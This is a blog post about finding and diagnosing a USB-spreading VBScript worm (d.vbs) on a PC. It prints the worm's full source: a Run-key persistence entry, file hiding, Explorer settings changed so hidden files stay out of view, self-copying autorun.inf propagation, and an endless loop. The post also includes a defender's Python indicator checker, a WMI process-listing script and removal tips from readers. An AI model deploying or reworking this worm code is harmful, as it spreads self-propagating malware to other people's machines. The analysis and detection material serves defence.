
Sunday, July 25, 2010

VB Script: How to create a virus?

For a couple of weeks I had been having a slow PC that eventually needed a restart. I turned off all the Windows services, removed all unnecessary software, and even removed software that was necessary but rarely used. Still to no avail. Then I went through my registry to clean up unwanted Run and RunOnce entries.

As I turned on the computer I could see a lot of wscript processes running, tens of them, hogging my CPU and memory like anything. I thought it might be a network policy imposed by the network department, and I used to close all of the running scripts one by one. But an eventual talk with the network admin revealed that no PC "runs" the policy on start-up, and that they had nothing to do with the wscript.exe scripts.

Since I was running Symantec Endpoint Protection with up-to-date virus definitions, I could not imagine a virus on my PC.

Most people think that WScript.exe is a virus, which it is not. It is the Windows Script Host (WSH). I have also used WScript quite a few times myself, which is probably why I never thought of removing that executable.

It can, however, execute scripts (VBScript or JScript) that you may not want or desire.

The following is a simple example taken from MSDN that writes to the registry.
Dim WshShell, bKey
Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\", 1, "REG_BINARY"
WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\MindReader", "Goocher!", "REG_SZ"

bKey = WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\")
WScript.Echo WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\MindReader")

WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\MindReader"
WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\"
WshShell.RegDelete "HKCU\Software\ACME\"

So, long story short, this always used to happen when I inserted my flash drive into the system. A couple of days ago I cancelled the action window that pops up when you insert a flash drive. I browsed the drive using Ctrl+E (Windows Explorer) and, to my astonishment, found a .VBS file, which is a VBScript file. I renamed the file and opened it. It was the code that was hogging my PC!

Though I did not like the slow PC at all, because I couldn't work, I did enjoy reading the code (0:

The following is what I found when I opened the d.vbs file; I have added a couple of comments to help the reader understand the code.

On Error Resume Next 'causes execution to continue with the next statement when an error occurs
set objfso=CreateObject("Scripting.fileSystemObject"
Set ws = CreateObject("wscript.Shell") ' Create a shell object
Set sh = CreateObject("Shell.application")
sour="C:\Tempe"
if objfso.FolderEXists(sour) Then ' Look for a folder
set tf =objfso.getFolder(sour)
tf.Attributes=39
End If

a=0
b=10
c=10

'Tweaking the registry
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer", sour & "\" &"d.vbs"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
if a=0 Then

if objfso.FileExists("C:\Tempe\win.exe") Then
ws.Run("C:\Tempe\win.exe")
end if
end if

Do
For Each flashdrive In objfso.drives
   If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path<>"A:" Then

If (flashdrive.drivetype = 1) Then 
pet=flashdrive.path & "\"

set tf=objfso.createtextfile(pet & "autorun.inf")
tf.writeline "[autorun]"
tf.writeline "shellexecute=wscript.exe d.vbs"
tf.writeline "shell=Open"
tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
tf.writeline "Action=Open to View Folder"
tf.writeline "Icon=tere.ico"
tf.close
set tf =objfso.getfile(pet & "autorun.inf")
tf.Attributes=39

if objfso.FileExists(pet&"autorun.inf") Then
set f = objfso.getfile(pet&"autorun.inf")
size = f.size
set text=f.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
end if
if tf=source Then
sour="C:\Tempe"
Else
set f = objfso.getfile(pet&"autorun.inf")
objfso.DeleteFile(f)
End If

If a=0 Then
ws.Run(pet)
ws.run(pet&"win.exe")
End If
a=a+1
sour="C:\Tempe"
pet=flashdrive.path & "\" 
dest=flashdrive.path & "\Tempe" 
sours="C:\Tempe\"

if a=3 Then
If objfso.FileExists(pet&"autorun.inf") Then
objfso.DeleteFile(pet&"autorun.inf")

set Fol=objfso.GetFolder(sour)
set tf=objfso.createtextfile(pet & "autorun.inf")
tf.writeline "[autorun]"
tf.writeline "shellexecute=wscript.exe d.vbs"
tf.writeline "shell=Open"
tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
tf.writeline "Action=Open to View Folder"
tf.writeline "Icon=tere.ico"
tf.close

set tf =objfso.getfile(pet & "autorun.inf")
tf.Attributes=39

End If
End If

If objfso.FileExists(pet&"d.vbs") Then
sour="C:\Tempe"
Else
set Fol=objfso.GetFolder(sour)
set f=objfso.GetFile(Fol&"\d.vbs")
objfso.CopyFile f, pet, OverWriteFiles
set f =objfso.getfile(pet & "d.vbs")
f.Attributes=39

set f=objfso.GetFile(Fol&"\win.exe")
objfso.CopyFile f, pet, OverWriteFiles
set f =objfso.getfile(pet & "win.exe")
f.Attributes=39

set f=objfso.GetFile(Fol&"\tere.ico")
objfso.CopyFile f, pet, OverWriteFiles
set f =objfso.getfile(pet & "tere.ico")
f.Attributes=39
set tf=objfso.createtextfile(pet & "autorun.inf")
tf.writeline "[autorun]"
tf.writeline "shellexecute=wscript.exe d.vbs"
tf.writeline "shell=Open"
tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
tf.writeline "Action=Open to View Folder"
tf.writeline "Icon=tere.ico"
tf.close
set tf =objfso.getfile(pet & "autorun.inf")
tf.Attributes=39

set mf = objfso.getfile(pet&"autorun.inf")
size = mf.size
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
End If

If objfso.FolderExists (sour) Then
set Fol=objfso.GetFolder(sour)
End If

If objfso.FileExists("C:\Tempe\d.vbs") Then
sour="C:\Tempe"
Else
set tf=objfso.createFolder("C:\"& "Tempe")
set Fol=objfso.GetFolder(sour)
Fol.Attributes=39
set f=objfso.GetFile(pet&"d.vbs")
objfso.CopyFile f, sours, OverWriteFiles
set f =objfso.getfile(sour & "\d.vbs")
f.Attributes=39
set f=objfso.GetFile(pet&"tere.ico")
objfso.CopyFile f, sours, OverWriteFiles
set f =objfso.getfile(sour & "\tere.ico")
f.Attributes=39
set f=objfso.GetFile(pet&"win.exe")
objfso.CopyFile f, sours, OverWriteFiles
set f =objfso.getfile(sour & "\win.exe")
f.Attributes=39
End If

set mf = objfso.getfile(pet&"autorun.inf")
size = mf.size
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
if a=3 Then
a=1
End If
End If
End If
Next
if check<>1 Then
Wscript.sleep 10000
end if
 
set mf = objfso.getfile(Wscript.ScriptFullname)
size = mf.size
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
Loop While (check <> 1) 

Happy diagnosing the virus! (0:
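As an added example (not part of the original post and not the script author's code), the Python below turns what d.vbs does into defender-side checks: it parses an autorun.inf and flags entries that hand control to wscript or cscript, flags Run entries that point at a script file, and reports the Explorer Advanced values in the state the script writes. The script hides its files with attribute 39 (ReadOnly + Hidden + System + Archive in the FileSystemObject attribute bits) and then sets ShowSuperHidden to 0 so that protected files are not displayed; it also writes Hidden with no type argument, which RegWrite stores as REG_SZ although Explorer keeps that value as a REG_DWORD. The autorun.inf text, Run values and Advanced values in the sample are constructed to match what the script writes; C:\Tempe is the folder named in the script. On a Windows host the two sample dictionaries can be replaced with read_hkcu_values(...), which reads the same keys through winreg.

```python
"""Triage helpers for the indicators the d.vbs script leaves behind.
Added example, not the post's own code: an autorun.inf that launches wscript.exe,
a Run entry pointing at a .vbs file, and Explorer view values changed so files
with attribute 39 (ReadOnly+Hidden+System+Archive) stay out of sight.  All
sample inputs are constructed, not captured from a real machine."""
import configparser
import re
import sys
from typing import Dict, List

SCRIPT_HOST_RE = re.compile(r"\b[wc]script(\.exe)?\b", re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.IGNORECASE)
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
ADVANCED_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"


def parse_autorun_inf(text: str) -> Dict[str, str]:
    """The [autorun] section as a dict with lower-cased keys ({} if absent or malformed)."""
    cp = configparser.ConfigParser(strict=False, interpolation=None,
                                   allow_no_value=True, delimiters=("=",))
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    for section in cp.sections():
        if section.lower() == "autorun":
            return {k: (v or "") for k, v in cp.items(section)}
    return {}


def launches_script(command: str) -> bool:
    """True if a command invokes the script host or names a script file."""
    return bool(SCRIPT_HOST_RE.search(command) or SCRIPT_EXT_RE.search(command))


def autorun_findings(text: str) -> List[str]:
    """autorun.inf entries that would hand control to wscript/cscript."""
    return [f"autorun.inf: {k}={v}" for k, v in parse_autorun_inf(text).items()
            if launches_script(v)]


def run_key_findings(run_values: Dict[str, object]) -> List[str]:
    """Run entries that start a script instead of a program."""
    return [f"Run\\{name} -> {cmd}" for name, cmd in run_values.items()
            if isinstance(cmd, str) and launches_script(cmd)]


def explorer_hiding_findings(advanced: Dict[str, object]) -> List[str]:
    """Explorer\\Advanced values in the state the script writes.  Hidden stored as a
    string is the telling one: RegWrite without a type stores a string as REG_SZ,
    while Explorer keeps this value as a REG_DWORD."""
    out = []
    if advanced.get("SuperHidden") == 1 and advanced.get("ShowSuperHidden") == 0:
        out.append("Advanced: SuperHidden=1, ShowSuperHidden=0 (protected files not shown)")
    hidden = advanced.get("Hidden")
    if isinstance(hidden, str):
        out.append(f"Advanced: Hidden is REG_SZ {hidden!r}, expected REG_DWORD")
    return out


def read_hkcu_values(subkey: str) -> Dict[str, object]:
    """All values under HKCU\\<subkey>; {} off Windows or when the key is absent."""
    if sys.platform != "win32":
        return {}
    import winreg  # Windows-only module
    values: Dict[str, object] = {}
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey) as key:
            index = 0
            while True:  # EnumValue raises OSError past the last value
                name, data, _type = winreg.EnumValue(key, index)
                values[name] = data
                index += 1
    except OSError:
        pass
    return values


# Constructed samples: the autorun.inf text the script writes, a Run key with one
# legitimate entry plus the script's "Explorer" entry, and Advanced values as the
# script leaves them (winreg returns REG_SZ as str and REG_DWORD as int).
SAMPLE_AUTORUN = ("[autorun]\nshellexecute=wscript.exe d.vbs\nshell=Open\n"
                  "Shell\\Open\\Command=wscript.exe d.vbs\n"
                  "Action=Open to View Folder\nIcon=tere.ico\n")
SAMPLE_RUN = {"ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
              "Explorer": r"C:\Tempe\d.vbs"}
SAMPLE_ADVANCED = {"SuperHidden": 1, "ShowSuperHidden": 0, "Hidden": "1"}

if __name__ == "__main__":
    # On a live Windows host use read_hkcu_values(RUN_KEY) and
    # read_hkcu_values(ADVANCED_KEY) in place of the two sample dicts.
    for line in (autorun_findings(SAMPLE_AUTORUN) + run_key_findings(SAMPLE_RUN)
                 + explorer_hiding_findings(SAMPLE_ADVANCED)):
        print(line)
```

The ShowSuperHidden check is reported only together with SuperHidden=1, because 0 is also the stock value on many builds; treat it as corroboration for the Run entry and the autorun.inf, which are the specific indicators.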

NOTE:

If you see a lot of wscript.exe processes running on your machine and you still doubt their actions, copy and paste the following code into a file named "Check for virus.vbs" and double-click it to run it.

The following code prints, in the form of message boxes, the command lines of all scripts being run by wscript.exe (or cscript.exe).

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = 'cscript.exe'" & _
        " OR Name = 'wscript.exe'")
For Each objItem in colItems
    Wscript.Echo objItem.CommandLine
Next


Keep pressing the OK button to see the list of scripts being run under wscript.exe.

Enjoy!

6 comments:

  1. Anonymous, 2:16 AM

    What's the output?

  2. Anonymous, 2:18 AM

    I mean, what does that VBS do?

  3. Silently hogging my machine, to be very precise.

  4. OK, thanks Kman..
    :)
    Nice blog.

  5. Anonymous, 8:30 AM

    I've just found this running on one of our client workstations at the office.

    As far as I can work out, it:
    1 - ensures that a folder called c:\tempe exists and that a copy of d.vbs exists within it
    2 - marks the folder and files as hidden
    3 - turns off hidden folder view in Windows Explorer
    4 - creates an entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    5 - consumes 99% of system resources

    It's easy to remove: just terminate the process, remove the c:\tempe folder and all its contents, then remove the Run entry from the registry.

  6. You can run the script in the edited section above to see what scripts are being run from which location.
